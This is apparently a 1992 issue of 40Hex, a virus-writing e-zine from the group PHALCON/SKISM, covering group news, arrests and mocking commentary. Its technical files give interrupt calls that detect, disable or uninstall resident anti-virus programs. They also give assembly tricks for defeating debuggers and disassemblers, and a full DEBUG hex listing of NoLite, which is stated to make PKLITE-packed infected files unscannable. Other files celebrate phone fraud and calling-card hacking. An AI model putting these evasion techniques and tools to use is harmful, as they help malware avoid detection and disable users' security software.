2554 lines
119 KiB
Plaintext
2554 lines
119 KiB
Plaintext
40Hex Number 6 Volume 2 Issue 2 File 000
|
||
|
||
|
||
Welcome to 40Hex issue 6. If this is your first time reading an issue of
|
||
40 Hex, I welcome you, but recommend that you start with an earlier issue.
|
||
This issue will have a Virus Spotlite on Creeping Death(Dir-2). It isn't in
|
||
the normal Hex Dump format, and it is fully commented.
|
||
|
||
- Landfill is temporarily down(again!). This is due to several [NuKEd]
|
||
hard drive controllers... we are down but NOT out. Hopefully we should be
|
||
up within several weeks of the release of this issue. Hellraiser is still
|
||
unable to edit the magazine, hopefully next issue he will be back in
|
||
charge.
|
||
|
||
- I think we must discuss one problem. Recently, we have been verbally
|
||
"attacked" by some lamers in the virus scene who like to jerk off on
|
||
Fidonet. To clear up the issue at hand, we personally don't use all of
|
||
the methods found in the articles. For example, we don't sit around all
|
||
day and PKLite infected files and then remove the PKLite header. We let
|
||
you people do it. As a matter of fact, we made it a hell of a lot easier
|
||
due to this month's article called NoLite. No self-respecting virus
|
||
group would do it. Not everyone that reads this magazine is a virus
|
||
programmer, but wants to learn. Ya gotta start somewhere. Another person
|
||
who has been insulting us on FidoNet is Sara Gordon. I do not know the
|
||
whole story behind her hatred, but I know it stems from a phone
|
||
conversation between her and Hellraiser. From what I understand, they
|
||
disagreed on many topics, and HR may have gotten insulting (I don't
|
||
know the whole story)
|
||
|
||
- Anyone that would like to submit articles feel free to do so, as long as
|
||
what you write is not stolen from another source and is of good quality.
|
||
If you would like to write articles contact any PHALCON/SKISM member or
|
||
upload them to either Digital Warfare or PHUN LINE.
|
||
|
||
|
||
|
||
40 Hex Mag Issue 6
|
||
April 1992
|
||
|
||
The Contents
|
||
|
||
File 000.............................You Are Here
|
||
File 001.............................Finding anti-viral programs in memory
|
||
File 002.............................Code Concealing: Part I
|
||
File 003.............................More Busts and Updates
|
||
File 004.............................The NoLite Utility
|
||
File 005.............................PHALCON/SKISM Update
|
||
File 006.............................Some Dick who wants to bust virus authors
|
||
File 007.............................The Kennedy Virus
|
||
File 008.............................Cornell students nailed for viruses
|
||
File 009.............................The Truth Behind Virus Scanners
|
||
File 00A.............................Virus Spotlite-Dir2 Full commented source
|
||
File 00B.............................Scan strings, and how to avoid them
|
||
File 00C.............................!Virus Contest!
|
||
|
||
Our Members: Axiom Codex(*)-(Sysop of PHUNLINE)
|
||
Count Zero(*)-(Hacker, Amiga Programmer, Master of 150#)
|
||
CRoW MeiSTeR(K)-(Sysop of Crow Tech., Goob)
|
||
Dark Angel-(Programmer, Master Chef)
|
||
DecimatoR(*)-(Sysop of Digital Warfare, Programmer)
|
||
Demogorgon-(Hacker, Programmer)
|
||
Garbageheap-(Fearless Leader, Sysop of LandFill, Programmer)
|
||
Hellraiser-(Fearless Leader, Programmer)
|
||
Instigator(*)-(Terry Oakes' butt-buddy, 40 Hex writer)
|
||
Joshua Tower-(Electronics, MonkeyWrenching)
|
||
Lazarus Long-(Programmer)
|
||
Night Crawler-(Courier, Keeper of All Virii)
|
||
Orion Rogue-(Rouge?, named us, then laid back, and relied on name)
|
||
Paragon Dude-(Macintosh Progammer(lonely))
|
||
Renegade(*?)-(Hacker, Macintosh Programmer)
|
||
Time Lord(*)-(Sysop of USSR Systems)
|
||
|
||
(*)-Denotes persons who should avoid bending over for the soap,
|
||
and invest in large quantities of KY Jelly.
|
||
(K)-Denotes persons who should get KY Jelly anyway.
|
||
(*?)-Denotes persons who came too close, and wisely backed off
|
||
and also saved a fortune on KY Jelly.
|
||
|
||
Special Goodbye's to:Piff'(Sorry ya had to quit)
|
||
|
||
Greets to: Attitude Adjuster, Dekion, Loki, [NuKE], Suicidal Maniac, and our
|
||
readers (do we have any?!?!?)
|
||
|
||
P.S. The transcript of the Alliance mentioned in last issue will NOT be
|
||
released in this issue. This issue is just too damned packed to add another
|
||
large file. It will be put into 40Hex-7, if we aren't in jail.
|
||
|
||
|
||
-)GHeap
|
||
40Hex Number 6 Volume 2 Issue 2 File 001
|
||
|
||
-------------------------------------------------------------------------------
|
||
Memory Resident Anti-Virus Detection
|
||
and Removal
|
||
-------------------------------------------------------------------------------
|
||
|
||
Here is a list of ways to see if anti-viral utils are present in memory.
|
||
I got the list out of PC interupts, a book by Ralph Brown. Here they are:
|
||
|
||
F.-DRIVER.SYS (Part of the F-Protect virus package by Fridrik Skulason.)
|
||
This program "grabs" the INT 21 monitoring code, if it was not
|
||
already taken by another program.
|
||
INT 21h, Function 4Bh, Sub Function EEh
|
||
AX must = 4BEEh at call, and call returns AX=1234h if F-Prot
|
||
sucessfully grabbed INT 21, and AX=2345h if the grab failed.
|
||
|
||
F-DLOCK.SYS (A HD access restrictor, part of F-Protect Package)
|
||
Call INT 2Fh, Funct. 46h, SubFunct 53h
|
||
At call, AX must = 4653h, CX=0005h, BX= 0000h
|
||
If present in ram, AX will return FFFFh. To uninstall, call
|
||
with AX & CX the same as above, but BX= 0001h. AX, ES, & BX
|
||
will be destroyed.
|
||
|
||
F-LOCK.EXE (Part of F-Protect package, looks for "suspicious" activity)
|
||
INT 2Fh, Funct 46h, SubFunct. 53h
|
||
To call: AX = 4653h, CX=0002h, BX=0000h (installation check)
|
||
BX=0001h (uninstall)
|
||
BX=0002h (disable v1.08 & below)
|
||
BX=0003h (enable v1.08 & below)
|
||
Call returns AX=FFFFh if installed ( BX=0000h at call)
|
||
AX, BX, and ES destroyed, if uninstalled (BX=0001 at call)
|
||
|
||
F-POPUP.EXE (Pop up menu for F-Protect)
|
||
INT 2Fh, Funct. 46h, SubFunct. 53h
|
||
To call: AX=4653h, CX=0004h, BX= 0000h, 0001h or 0002h
|
||
(See above - BX same as F-Lock)
|
||
Returns: Same as F-LOCK.EXE
|
||
|
||
F-XCHK.EXE (Prevents execution of any progs which don't have self-checking
|
||
code added by F-XLOCK)
|
||
INT 2Fh, Funct. 46h, SubFunct 53h
|
||
To Call: Registers = same as F-Popup, except CX=0003h, and
|
||
BX = 0000h (installation check) or 0001h (uninstall)
|
||
Returns: same as F-LOCK, above.
|
||
|
||
TBSCANX (Resident Virus scanning Util by Frans Veldman)
|
||
INT 2Fh, Function CAh, SubFunct 00h
|
||
Call: AX=CA01, BX=5442h ("TB")
|
||
Returns: AL=00h if not installed, AL=FFh if installed
|
||
BX=7462h ("tb") if BX was 5442h during call
|
||
|
||
INT 2Fh, Function CAh, Subfunction 02h (Set state of TBSCANX)
|
||
Call: AX=CA02h, BL = new state (00h=disabled, 01h=enabled)
|
||
|
||
VDEFEND (Part of PC-tools. Works on v7.0)
|
||
INT 21h, Function FAh
|
||
To call: AH=FAh, DX=5945h, AL=subfunction (01h to uninstall)
|
||
returns: CF set on error, DI = 4559h (?)
|
||
|
||
DATAMON (PC Tools 7.0 file protection)
|
||
INT 2Fh, Funct 62h, Sub Funct 84h
|
||
Call: AX=6284h, BX=0000h (for installation check), CX=0000h
|
||
Returns: AX=resident code segment, BX & CX = 5555h
|
||
|
||
Flu Shot, or Virex PC
|
||
INT 21h
|
||
Call: AX=0ff0fh
|
||
Returns if either is installed: AX=101h
|
||
|
||
If anyone has any more Anti-Viral IDs, post 'em on Digital Warfare and I'll
|
||
update this list.
|
||
|
||
---DecimatoR PHALCON/SKISM
|
||
40HEX_6_002 SEGMENT PUBLIC 'code'
|
||
ORG 100H
|
||
ASSUME CS:CODE,DS:CODE,SS:CODE,ES:CODE
|
||
|
||
;******************************************************************************
|
||
|
||
Concealment: Keep Your Code Hidden From Prying Eyes
|
||
by Demogorgon/PHALCON/SKISM
|
||
|
||
|
||
Recently, I have been experimenting with a few new programming techniques
|
||
that should be of great interest to the virus writing community. It is always
|
||
our top priority to keep our code out of the hands of lamers in order to
|
||
prevent the dreaded 'text change' and above all, to cause the anti-virus
|
||
community as much grief as possible. In order to do this, we must put a great
|
||
deal of effort into concealing our code. That is the focus of this article.
|
||
|
||
This file is divided into two parts. The first part is devoted to developing
|
||
'debug resistant' code, and the second part deals with defeating disassemblers.
|
||
I will not cover encryption, because methods of encryption are commonly known
|
||
and there is really not much further I can go with that. For a complete review
|
||
of self encryption methods, take a look at Dark Angel's Funky Virus Writing
|
||
Guide (number three, the one that hasn't been released yet.)
|
||
|
||
Part_I: The debugger is NOT your friend
|
||
|
||
The basic idea behind writing debug ressistant code is finding a way to
|
||
make your code behave differently when it runs under a debugger. With a real
|
||
mode debugger, this is simplicity itself. All that is necessary is a little
|
||
knowledge of how a debugger works. A debugger, such as debug or TD traces
|
||
through a program by setting handlers to int 1 and int 3. These are called
|
||
after every instruction is executed. A virus that wishes to avoid being
|
||
debugged can simply replace the handlers for these interrupts, and the results
|
||
will be just about whatever you want. Here is some code to do this:
|
||
|
||
eat_debug:
|
||
push cs
|
||
pop ds
|
||
mov dx, offset eat_int
|
||
mov ax,2501h
|
||
int 21h
|
||
mov al,03h
|
||
int 21h
|
||
... ; rest of code
|
||
eat_int: iret
|
||
|
||
As you can see, this requires minimal space in your code, and is certainly
|
||
worth the effort. You can experiment by placing something else at 'eat_int'.
|
||
Another commonly used tactic is to disable the keyboard interrupt while certain
|
||
parts of the code are being executed. This will surely keep lamers baffled,
|
||
though a pro would recognize what was going on immediately. I am sure McAfee's
|
||
programmer's scoff at code such as this. Also note that while this will defeat
|
||
the average real mode debugger, any protected mode debugger will step through
|
||
this as if it weren't there. Playing with interrupts will not help you when
|
||
your program will be running in a virtual cpu anyway. One method I found which
|
||
will work nicely against td386 is to throw in a hlt instruction. This will
|
||
give TD an exception 13 error, and terminate the program. Anyone who is aware
|
||
of this will just step over a hlt instruction, so therefore methods must be
|
||
used to conceal its presence, or to make it a necessary part of the code. This
|
||
will be covered in part II.
|
||
Another trick you can play is to call int3 within your program. If
|
||
someone tries to run your program under a debugger, it will stop each time int3
|
||
is called. It is possible to trace through it, but it will be annoying if
|
||
there are many int3's thrown in.
|
||
|
||
Part_2: Kill your disassembler
|
||
|
||
No matter how well you mess up debuggers, your program is entirely at the
|
||
mercy of a programmer armed with a good disassembler. Unless, of course, you
|
||
use techniques that will confuse disassemblers. My favorite method for
|
||
baffling them is to create code that overlaps. Overlapping code may seem a
|
||
little bit too complicated for most of us at first, but with the knowledge of a
|
||
few instruction hex translations, you too can make effective overlapping code
|
||
without sacrificing too much code size. Overlapping code can get as complex as
|
||
you would like, but this file will only deal with the simplest examples.
|
||
|
||
|
||
eat_sr: mov ax,02EBh
|
||
jmp $-2 ; huh?
|
||
... ; rest of code
|
||
|
||
This may confuse you at first, but it is fairly simple. The first instruction
|
||
moves a dummy value into ax. The second instruction jmps into the value that
|
||
was just moved into ax. '02EB' translates into 'jmp $+2' (remember that words
|
||
are stored in reverse). This jump goes past the first jmp, and continues on
|
||
with the code. This will probably not be sufficient to defeat a good
|
||
disassembler like Sourcer, but it does demonstrate the technique. The problem
|
||
with this is that Sourcer may or may not just pick up the code after commenting
|
||
out the 'jmp $-2'. It is difficult to predict how Sourcer will respond, and it
|
||
usually depends on the bytes that appear directly after the jmp. To severely
|
||
baffle Sourcer, it is necessary to do some stranger things. Take a look at
|
||
this example.
|
||
|
||
erp: mov ax,0FE05h
|
||
jmp $-2h
|
||
add ah,03Bh
|
||
... ; rest of code
|
||
|
||
This code is quite a bit more useful than the previous listing. Let us
|
||
simulate what would happen if we were to trace through this code, showing a hex
|
||
dump at each step to clarify things.
|
||
|
||
B8 05 FE EB FC 80 C4 3B mov ax,0FE05h ; ax=FE05h
|
||
^^ ^^ ^^
|
||
B8 05 FE EB FC 80 C4 3B jmp $-2 ; jmp into '05 FE'
|
||
^^ ^^
|
||
B8 05 FE EB FC 80 C4 3B add ax,0EBFEh ; 05 is 'add ax'
|
||
^^ ^^ ^^
|
||
B8 05 FE EB FC 80 C4 3B cld ; a dummy instruction
|
||
^^
|
||
B8 05 FE EB FC 80 C4 3B add ah,3Bh ; ax=2503h
|
||
^^ ^^ ^^
|
||
|
||
The add ah,03Bh is there simply to put the value 2503h into ax. By adding
|
||
five bytes (as opposed to simply using 'mov ax,2503h') this code will confuse
|
||
disassemblers pretty well. Even if the instructions are disassembled properly,
|
||
the value of ax will not be known, so every int call after this point will not
|
||
be commented properly, as long as you never move a value into ax. You can
|
||
conceal the value from the disassembler by using 'add ax' or 'sub ax' whenever
|
||
possible.
|
||
If you examine this closely, you can see that any value can be put into
|
||
ax. Two of the values can be changed to whatever you want, namely the FE in
|
||
the first line, and the 3B in the last line. It is helpful to debug through
|
||
this chunk of code to determine what values should be placed here in order to
|
||
make ax what you would like it to be.
|
||
Back to the subject of killing debuggers, it is very sneaky to hide
|
||
something like a hlt instruction inside another instruction, such as a jmp.
|
||
For example, take a look at this:
|
||
|
||
glurb: mov cx,09EBh
|
||
mov ax,0FE05h ;-\
|
||
jmp $-2 ; >--this should look familiar to you
|
||
add ah,03Bh ;-/
|
||
jmp $-10
|
||
... ; rest of code
|
||
|
||
The three lines in the middle are a repeat of the previous example. The
|
||
important part of this code is the first line and the 'jmp $-10'. What happens
|
||
is, the jmp goes back into the 'mov cx' instruction. The '09EB' translates
|
||
into 'jmp $+9'. This lands in the '$-10' part of the first jmp. The $-10 just
|
||
happens to be stored as 0F4h, the hlt instruction. By making the hlt part of
|
||
another instruction, it is not visible when it is being traced through by
|
||
td386. It is also not possible to remove it without altering the code.
|
||
|
||
The purpose of this article is not to supply code to be thrown into your
|
||
own programs. The purpose is to get you to think about new ways to avoid
|
||
having your code looked at and modified by others. The most important thing is
|
||
to be original. It is pointless for you to simply duplicate this code, because
|
||
anyone else who has read this file will already know what you are trying to do.
|
||
|
||
code ENDS
|
||
END concealment
|
||
40Hex Number 6 Volume 2 Issue 2 File 003
|
||
|
||
|
||
Well, there have been plenty of busts in 1992 so here is the run down
|
||
to the best of my knowledge for anyone who is interested:
|
||
|
||
Asphi: Busted by MCI on January 20 for hacking on 476's. Had to pay $2700 for
|
||
the phone calls he made. From what I found out MCI Wants to nail him to
|
||
the wall. Charges include: Unlawful use of a computer, Credit Card
|
||
Fraud, Theft of Services, Criminal Conspiracy and some more I can't
|
||
think of, 10 or so total. And of course they took his system. He is
|
||
going to have a trial, but a date has not yet been set.
|
||
|
||
Axiom Codex: Billed $2000 for equal access codes.
|
||
|
||
Cold Steel: Billed $40.00 for 476's
|
||
|
||
Count Zero: Yet another that got nailed for 476's. Billed $86.63 and had to
|
||
tell his parents.
|
||
|
||
Deathblade: Billed $100 for 476's.
|
||
|
||
Dekion: Also nailed for 476's. Not sure if he will be charged. Billed
|
||
somewhere between $100 - $1000.
|
||
|
||
Genghas Khan: Nailed for CBI and for 733's. Not sure about what will happen
|
||
to him, but I heared from his friend that he is really screwed.
|
||
|
||
Instigator: I got nailed in the 476 ring too. They took my system but gave
|
||
it back. I got billed for $1970.17. I got charged with 1 count
|
||
of Theft of services. They dropped the other 8 charges. I am
|
||
going to be on informal probation for a short period.
|
||
|
||
Marauder: Raided last year by GBI, they took his computer equipment and
|
||
never gave it back. They finally decided to charge him with
|
||
some misdemeanors.
|
||
|
||
Netrunner: Billed $100 for 476's.
|
||
|
||
Terminal: Arrested same time as Genghas Kahnvict. He is NOT a minor...
|
||
|
||
VenoM: 476's again. Billed $75.00 and had to tell his parents.
|
||
|
||
|
||
*** AND the LAMEST bust of the month award goes to:
|
||
|
||
DecimatoR - for sitting in his car along a main road while using the beige box!
|
||
He ran up a wopping $0.81 phone bill before the cop came by and asked him
|
||
if he was having car trouble and saw the wires running from the car into the
|
||
telephone pole. He was arrested, then released. No charges have been filed....
|
||
yet!
|
||
|
||
|
||
*** AND the second LAMEST bust of the month award goes to:
|
||
|
||
Hot Rize - for wizely running his neighbors phone line into his own house. No
|
||
one would notice that one, eh? We also recieved confirmed reports that he is a
|
||
dweeb.
|
||
|
||
-------------------------------------------------------------------------------
|
||
|
||
All 4 PHALCON/SKISM joints went down between January and March. The Landfill
|
||
for security reasons, Digital Warfare because of me getting busted, PHUN LINE
|
||
for security reasons, and USSR because Time Lord may be getting busted.
|
||
Digital Warfare went back up though, with DecimatoR as sysop.
|
||
|
||
** Apparently the head of the 476 operations is Terry Oakes. He is the phone
|
||
Fraud investigator in charge of the TeleConnect Investigations. Give him a
|
||
ring at 800-476-1234 Ext. 3045. Thank you.
|
||
|
||
** References to 476's are refering to 800-476-9696 owned by Teleconnect, a
|
||
subsidary of MCI. (6 Digit Calling Cards - Get a LAMER to hack 'em)
|
||
|
||
** Make sure you change your passwords if you use the same one on Digital
|
||
Warfare as you do on other boards. They have the OLD user list.
|
||
|
||
** Additions to the list will be on a first busted first added basis.
|
||
|
||
|
||
-Instigator
|
||
40Hex Number 6 Volume 2 Issue 2 File 004
|
||
|
||
NOLITE v1.0
|
||
By DecimatoR
|
||
of PHALCON/SKISM
|
||
PD War Collection Program 1
|
||
|
||
This program will remove the PKLITE header from .EXE and .COM for
|
||
two reasons.
|
||
|
||
A) To make the file un-decompressable, which dosen't mean much if
|
||
you have the registered version of PKLITE.
|
||
|
||
B) More importantly, makes the PKLITEd file unscannable to virus
|
||
scanners, such as McAfees' Virus Scan etc...
|
||
|
||
Does this by overwriting the header with random text from memory.
|
||
|
||
Parameters are simple:
|
||
|
||
NOLITE filename.ext (Extension MUST be included!)
|
||
|
||
Will remove the header from PKLITEd files. It will not remove the
|
||
header if it is not a genuine PKLITE file.
|
||
|
||
Note: This program is based on PKSMASH, which was written by Hellraiser.
|
||
Unfortunately, a bug surfaced in that program, which caused it
|
||
to lock up sometimes. So I wrote this to replace PKSMASH, and
|
||
stole HR's dox. <sorry dude>
|
||
|
||
---DecimatoR
|
||
|
||
Cut out the following code, call it NOLITE.HEX, then DEBUG < NOLITE.HEX
|
||
|
||
------------- Rip here ---------- Slice here ---------- Mince Here ----------
|
||
|
||
n nolite.com
|
||
e 0100 4D 5A 53 00 03 00 00 00 09 00 FB 00 FF FF 46 00
|
||
e 0110 00 04 00 00 00 01 F0 FF 50 00 00 00 03 01 9A 07
|
||
e 0120 8A 15 20 83 C4 06 B8 0D 00 50 B8 01 00 50 9A 2F
|
||
e 0130 89 15 20 83 C4 04 C7 06 38 6B 00 00 8B E5 5D C3
|
||
e 0140 55 8B EC 83 EC 02 FF 36 16 35 E8 C4 19 83 C4 00
|
||
e 0150 7A 01 03 00 01 00 20 00 09 00 FF FF 00 00 00 00
|
||
e 0160 00 00 00 01 00 00 3E 00 00 00 01 00 FB 30 6A 72
|
||
e 0170 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|
||
e 0180 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|
||
e 0190 B8 38 01 BA 3D 00 8C DB 03 D8 3B 1E 02 00 73 1D
|
||
e 01A0 83 EB 20 FA 8E D3 BC 00 02 FB 83 EB 19 8E C3 53
|
||
e 01B0 B9 C3 00 33 FF 57 BE 48 01 FC F3 A5 CB B4 09 BA
|
||
e 01C0 36 01 CD 21 CD 20 4E 6F 74 20 65 6E 6F 75 67 68
|
||
e 01D0 20 6D 65 6D 6F 72 79 24 FD 8C DB 53 83 C3 2D 03
|
||
e 01E0 DA BE FE FF 8B FE 8C CD 8B C5 2B EA 8B CA D1 E1
|
||
e 01F0 D1 E1 D1 E1 80 EC 10 80 EF 10 8E C0 8E DB F3 A5
|
||
e 0200 FC 8E DD 07 06 BF 00 01 33 F6 AD 95 BA 10 00 EB
|
||
e 0210 2C 90 AD 95 B2 10 EB 35 AD 95 B2 10 EB 36 AD 95
|
||
e 0220 B2 10 EB 3B AD 95 B2 10 EB 5D AD 95 B2 10 EB 5E
|
||
e 0230 AD 95 B2 10 EB 5F AD 95 B2 10 72 08 A4 D1 ED 4A
|
||
e 0240 74 F4 73 F8 33 C9 33 DB D1 ED 4A 74 C5 D1 D3 D1
|
||
e 0250 ED 4A 74 C4 D1 D3 85 DB 74 17 D1 ED 4A 74 BF D1
|
||
e 0260 D3 80 FB 06 72 0B D1 ED 4A 75 04 AD 95 B2 10 D1
|
||
e 0270 D3 2E 8A 8F 5E 01 80 F9 0A 74 74 33 DB 83 F9 02
|
||
e 0280 74 2A D1 ED 4A 74 9D 72 23 D1 ED 4A 74 9C D1 D3
|
||
e 0290 D1 ED 4A 74 9B D1 D3 D1 ED 4A 75 04 AD 95 B2 10
|
||
e 02A0 D1 D3 80 FB 02 73 15 2E 8A BF 6E 01 AC 8A D8 56
|
||
e 02B0 8B F7 2B F3 FA F3 26 A4 FB 5E EB 81 D1 ED 4A 75
|
||
e 02C0 04 AD 95 B2 10 D1 D3 80 FB 08 72 DB D1 ED 4A 75
|
||
e 02D0 04 AD 95 B2 10 D1 D3 80 FB 17 72 CB D1 ED 4A 75
|
||
e 02E0 04 AD 95 B2 10 D1 D3 81 E3 DF 00 86 DF EB BD AC
|
||
e 02F0 02 C8 80 D5 00 3C FF 75 82 5B 8B EB 83 C3 10 33
|
||
e 0300 C0 AC 91 E3 0E AD 03 C3 8E C0 AD 97 26 01 1D E2
|
||
e 0310 F9 EB EC AD 03 C3 FA 8E D0 AD 8B E0 FB AD 03 D8
|
||
e 0320 53 AD 50 8E C5 8E DD 33 C0 8B D8 8B C8 8B D0 8B
|
||
e 0330 E8 8B F0 8B F8 CB 03 00 02 0A 04 05 00 00 00 00
|
||
e 0340 00 00 06 07 08 09 01 02 00 00 03 04 05 06 00 00
|
||
e 0350 00 00 00 00 00 00 07 08 09 0A 0B 0C 0D 00 00 00
|
||
e 0360 3A 00 00 F5 01 B8 23 00 8E C0 E8 CF 00 E8 00 00
|
||
e 0370 C7 00 83 FA 01 B4 09 BA 5C 00 CD 21 74 0A BA 87
|
||
e 0380 55 00 00 0C 09 E9 07 01 33 C9 E8 E7 40 01 00 8B
|
||
e 0390 D7 B0 02 B4 3D 10 73 03 E9 EE 00 28 40 A3 0C 00
|
||
e 03A0 B9 39 51 59 41 83 F9 64 75 39 15 2A CB 2A DD 12
|
||
e 03B0 8B 09 A5 1E 1A 01 00 BA 0E 12 3F 28 50 12 80 3E
|
||
e 03C0 08 50 75 D9 B9 0B B6 52 11 0F 11 BE 07 BF 49 81
|
||
e 03D0 38 10 F3 A6 3A 00 74 0C 5A 52 52 8A 5C B0 1A 42
|
||
e 03E0 1A EB B3 A2 6A 0A 33 D2 0A 0E 16 95 43 10 59 49
|
||
e 03F0 30 27 5B 35 0D B4 40 58 31 91 24 0F 16 5A 0F 72
|
||
e 0400 6E A5 1F 35 49 01 09 16 B4 3E 3D 00 40 64 90 8A
|
||
e 0410 04 3C 20 74 06 3C 09 74 02 3C 0D C3 01 40 27 4A
|
||
e 0420 01 C3 32 ED 8A 0E 80 00 41 BE 81 01 00 73 4C 01
|
||
e 0430 E8 DE FF 75 03 46 E2 F8 51 E3 03 00 A4 FC F3 A4
|
||
e 0440 06 1F 59 33 DB E3 0F BE 18 C6 02 85 18 04 C6 04
|
||
e 0450 00 43 1C F4 89 1E 29 A1 36 C0 2E E3 0C 3B 0E 00
|
||
e 0460 B0 0C 73 06 FC AE 75 FD E2 FB C3 BA FD 21 01 E0
|
||
e 0470 B4 4C A0 0B 7E 00 4B 4C 49 54 45 A0 01 20 43 6F
|
||
e 0480 70 72 2E 47 8B 0D 0A 36 00 4E 4F 5F 28 63 29 20
|
||
e 0490 31 39 39 32 20 00 00 44 65 63 69 6D 61 74 6F 52
|
||
e 04A0 20 50 48 41 4C 43 4F 00 00 4E 2F 53 4B 49 53 4D
|
||
e 04B0 0D 24 0A 20 20 52 65 6D 6F 70 42 76 65 73 20 50
|
||
e 04C0 93 73 69 67 6E 01 14 2A 75 72 65 20 66 72 6F 6D
|
||
e 04D0 05 69 A5 0A 6C 1C 2E 52 28 55 73 DC 66 65 3A 20
|
||
e 04E0 59 3C 17 A1 4C 27 6D 65 3E 1A 24 1D 3A 05 4E 6F
|
||
e 04F0 08 40 77 61 55 66 6F 75 00 00 6E 64 20 2D 20 6E
|
||
e 0500 6F 74 68 69 6E 67 20 64 6F 6E 36 25 65 07 32 45
|
||
e 0510 72 5F 72 4B A1 1A 2C 74 81 70 74 20 A0 E0 28 73
|
||
e 0520 75 63 63 6C 73 66 75 6C 74 7A 22 53 10 21 AB A4
|
||
e 0530 5A 40 4E 72 C6 69 AA 52 44 48 19 74 A0 01 40 79
|
||
e 0540 65 64 21 24 FF 01 00 00 01 01 00 00 00 00 00 00
|
||
e 0550 00 00 01 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A
|
||
rcx
|
||
055F
|
||
w
|
||
q
|
||
|
||
------------- Rip here ---------- Slice here ---------- Mince Here ----------
|
||
40Hex Number 6 Volume 2 Issue 2 File 005
|
||
|
||
|
||
I'm back, well kind of. Anyways, a lot of people have been
|
||
asking, "What's going on with the group?" The question should be, "What's going
|
||
on with any group these days?" It seems to me that 1992 was the death of h/p,
|
||
or at least the "ice age" of it. Everybody was either getting busted or
|
||
quitting the scene. Oh well, what can I say about it. Our group has been
|
||
having bad luck too. Five (now six) busted as well as other assorted bad
|
||
things happening to members.
|
||
|
||
Anyways, what's going on with us, huh?. Well the reason you
|
||
haven't heard much from us is because we haven't been releasing our new stuff
|
||
to BBS systems ( BBS system sounds as redundant as PIN number, I know) because
|
||
we have a strong feeling that members of such groups as the CVIA are logging on
|
||
to h/p boards in the hope of snatching the latest viruses. Well not much you
|
||
can do about it if you run a BBS, unless you personnally know everyone who calls
|
||
your board. But come to think of it - what good does it prove to release your
|
||
newest creation to the general public (of the h/p crowd) via BBS system? Isn't
|
||
that the same principle as the warez puppy scene? I guess you all can do
|
||
whatever turns you on but we kind of decided that it would be in our best
|
||
interests to release our stuff to BBS's only after they have been detected by
|
||
the popular scanners or until they are kind of old. Not to fear, 40-HEX and
|
||
"Dark Angel Phunky Writing Guide" will still be on boards at the same rate as
|
||
always.
|
||
|
||
As for all of you people bitching that no longer have sites
|
||
and that we are dead, well your dead - wrong. The current sites are as follows
|
||
(in no specific order) - Digital Warfare (yes it's back, at a new number
|
||
however), Time Lords BBS (The U.S.S.R System), The Phunline (yes it's back),
|
||
and the newest addition - Crow Technology. And as for us being dead yeah
|
||
right.
|
||
|
||
** Note from DecimatoR:
|
||
The U.S.S.R System recently went down, due to Time Lord getting into a little
|
||
hot water. It WILL return however... we're just not sure when. **
|
||
|
||
** Note from GHeap:
|
||
I am coming back, gimme mo' time!
|
||
|
||
So now with that out of the way, on the other news. Hmmm.....
|
||
Michelangelo caused quite a scare there for a while. It was pretty cool
|
||
to see John, Patti, and the rest of the crew on T.V... John Dvorak has a new
|
||
half hour computer talk show on syndicated radio. I'm sure he wouldn't mind if
|
||
we got on the show some time soon. Check your local radio guide for your local
|
||
station and time... I am offering a standing bounty of $1,500 for the person
|
||
willing to fly to Ohio and kick Crow Meisters ass for good. A minor would be
|
||
preferred, being that he is under 18 and if I smashed him I could get sued or
|
||
something. Just kidding, Crow Meister is cool with me, hihihihi... A new
|
||
federal law is being considered which if passed will outlaw the authorship of
|
||
computer viruses totally, research or not. Read more about that later in this
|
||
issue... Hey, I might have a BBS up soon! I have been saying that for the past
|
||
2 years haven't I? Well that's the news as I see it, it's nice to be writing
|
||
for this rag again.
|
||
|
||
Check ya in 25 to life....
|
||
|
||
Hellraiser P/S
|
||
1992
|
||
|
||
This article was typed by Time Lord for HR cuz he is WAY too lazy to send me
|
||
a disk in place of a fuckin print out...
|
||
40Hex Number 6 Volume 2 Issue 2 File 006
|
||
|
||
Well, this little news "tid-bit" came from Attitude Adjuster, one of the
|
||
few non-PHALCON/SKISM contributers (ok, the ONLY non P/S member), Thanks a
|
||
lot dude, keep the submissions coming. The article itself is quite sad,
|
||
and makes me question the intelligence of our opposition.
|
||
|
||
-)GHeap&Demo
|
||
Thanx to CZ for THE line.
|
||
-------------------------------------------------------------------------------
|
||
|
||
- We need Computer Virus Snitches -
|
||
Written By Mike Royko, Tribune Media Services.
|
||
Retyped by The Attitude Adjuster
|
||
|
||
============================================================================
|
||
Millions of computer users are wondering how to protect themselves
|
||
against the wave of viruses that are threatening their machines. I have a
|
||
suggestion.[So do I, avoid Bnu 1.90Beta]
|
||
First, they should remember that these viruses don't spring from
|
||
nature. They are little computer programs that are created and sent on
|
||
their way by people that are brainy, malicious and arrogant.[I am not
|
||
brainy]
|
||
So, the question is, how do you find the creators of computer
|
||
virus programs?
|
||
Because they are arrogant, it's likely that they want someone to
|
||
know what a clever thing they have done. They won't hold a press conference
|
||
[Actually, we do hold press conferences. See Michael Alexander@Computerworld]
|
||
but chances are they will brag to a trusted friend or acquaintance or
|
||
fellow hacker.
|
||
It is sad, but the world is full of snitches.[Get a thesaurus] Look
|
||
at John Gotti, the nation's biggest Mafia boss. There was a time when it
|
||
was unthinkable for even the lowest-level Mafia soldier to blab. But now
|
||
Gotti has to sit in court while his former right-hand man tells about how
|
||
they got people whacked. [We whack people too]
|
||
So if Mafia figures can be persuaded to tattle[Na-na-na-na-na], is
|
||
there any reason to believe that nerds have a greater sense of honor and
|
||
loyalty? [Yes, we also have brains]
|
||
Of course[.] not, but how do you get them to do it?
|
||
|
||
Money. [Now yer talking... my mom is really the Dark Avenger, I want
|
||
my money now.]
|
||
|
||
These companies [what companies, I only hit hospitals] could use
|
||
petty cash to place ads in the computer magazines and on the electronic
|
||
bulletin boards. [Ok, call my BBS and post this tidbit. 40Hex now has ad
|
||
space available]
|
||
The ads would say something like: "A $50,000 reward for any
|
||
information leading to the arrest and conviction of virus authors."
|
||
[How can you convict a virus author. It isn't illegal. Go play Tank Wars.]
|
||
The next question would be what to do with the virus makers once
|
||
they have been caught. And that's the key to putting an end to the
|
||
problem: something that could be posted on those electronic bulletin
|
||
boards that might cause an aspiring virus-maker to go take a brisk walk
|
||
instead.
|
||
A judge would sit and listen to an attorney who would say some-
|
||
thing like this:
|
||
"Your honor, what we have here is an otherwise fine young man
|
||
from a good family. His father is a brilliant scholar, and the son will
|
